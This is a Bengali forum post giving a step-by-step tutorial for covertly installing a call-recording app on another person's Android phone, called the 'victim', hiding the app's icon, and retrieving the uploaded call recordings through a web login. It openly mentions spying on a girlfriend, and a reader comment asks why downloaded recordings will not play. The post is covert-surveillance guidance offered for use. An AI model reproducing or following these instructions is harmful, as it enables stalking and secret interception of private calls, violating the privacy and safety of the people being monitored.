আসসালামু আলাইকুম। কেমন আছেন সবাই।আশাকরি সবাই ভাল আছেন।টিটিতে আমি সম্পূর্ণ নতুন তাই ভুল ত্রুটি গুলো ক্ষমার চোখে দেখবেন।
আসুন অন্যর এন্ড্রয়েট ফোন হ্যাক করে তার কল রিকোর্ড শুনি নিজের মোবাইলে।
কি অবাক হচ্ছেন তো?? আরে ভাই অবাক হওয়ার কিছুই নাই।বর্তমান সময়ে প্রযুক্তি আমাদের হাতে এন্ড্রয়েট ফোন দিয়েছে।আর এই এন্ড্রয়েট ফোন দিয়ে এখন অনেক কিছুই সম্ভব।যা আমরা কখনোই কল্পনা করিনি।
টাইটেল টা দেখে অনেকে মনে মনে ধরেই নিয়েছেন যাক এইবার অন্তত গার্ল ফ্রেন্ডের দিন শেষ।আমার দিন শুরু।
আমি তাদের কে বলি।ভাই সত্যি কারের ভালবেসে থাকলে এই কাজটা অন্তত করতে যাইয়েন না।এইটা করলে রিলেশনে যে ফাটল ধরবে তা আমি সিউর (প্রমাণিত)।(এইখানে একটা দুক্কের ইমু হপে)
তো যাইহোক কাজের কথাই আসি।
এই অ্যাপ কিভাবে কাজ করে।।
এইটা এমন একটা অ্যাপ যা প্রথমে ভিক্টিমের ফোনে ইন্সটল করে দিতে হবে।আর ভিক্টিম টা এমন হতে হবে যে নেট ইউজ করে।কারন নেট ছাড়া হ্যাকিং পুরাই ইম্পসিবল।
-:শুরু:-
১। প্রথমে নিচের লিংক থেকে অ্যাপটি ডাউনলোড করুন।
২।অ্যাপে ঢুকুন।এক্সেপ্ট দিয়ে ৩ টা বক্স দেখতে পাবেন।
৩।যে ইমেল দিয়ে রেজিস্টার করবেন সেইটা দিন।তারপর পাসওয়ার্ড দিন।দুইটা বক্সে একই পাসওয়ার্ড দিবেন।
৪।সেটিং থেকে Hide app করে দিন।এবং বের হয়ে আসুন।
এখন ওই ফোনে অ্যাপসটি আর খুজে পাওয়া যাবে না।ওই ফোন দিয়ে যতো রিকোর্ড হবে সব ইমেলে আপলোড হবে নেট কানেক্ট দেয়ার সাথে সাথে।
৫। এই লিংকে ঢুকুন।
৬।ইমেল আর পাসওয়ার্ড দেয়ার যায়গায় অ্যাপে দেয়া ইমেল আর পাসওয়ার্ড দিয়ে লগিন করুন।
৭।তারপর Get Records এ ক্লিক করুন।এবং অপেক্ষা করুন ৫/১০ মিনিট।
৮।তারপর ইমেলে থাকা রিকোর্ড গুলো ওখানে আপলোড হবে।এবং আপনি ইচ্ছা করলে সেখান থেকে শুনতে বা ডাউনলোড করতে পারবে রিকোর্ড গুলো।
বুঝতে সমস্যা হলে নিচে স্ক্রিন সর্ট দেয়া আছে।আর আপনাদের সুবিধার্তে ভিডিও টিউটোরিয়াল ও দেয়া আছে দেখতে পারেন।
যদিও এই টিউটোরিয়াল টা আমার জীবনের প্রথম করা আশা করি ভুল ত্রুটি গুলো ক্ষমার চোখে দেখবেন।
অ্যাপসটি ভয়েস রিকোর্ডে অনেক কম MB খরচ করে।
ডাউনলোডের জন্য ফোনের ডিফল্ট ব্রাউজার বা Uc ব্রাউজার ব্যবহার করবেন।ক্লিক Create Download link।অন্য কোন পেজে গেলে ব্যাক করে আগের পেজে এসে Create Download link ক্লিক করুন।
আমার সাইট।মন চাইলে একবার ঘুরে আসুন।
আমি সৈকত অভি। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 9 বছর 2 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 10 টি টিউন ও 8 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
download korar por record sona jaccena.. kivabe sunte parbo..??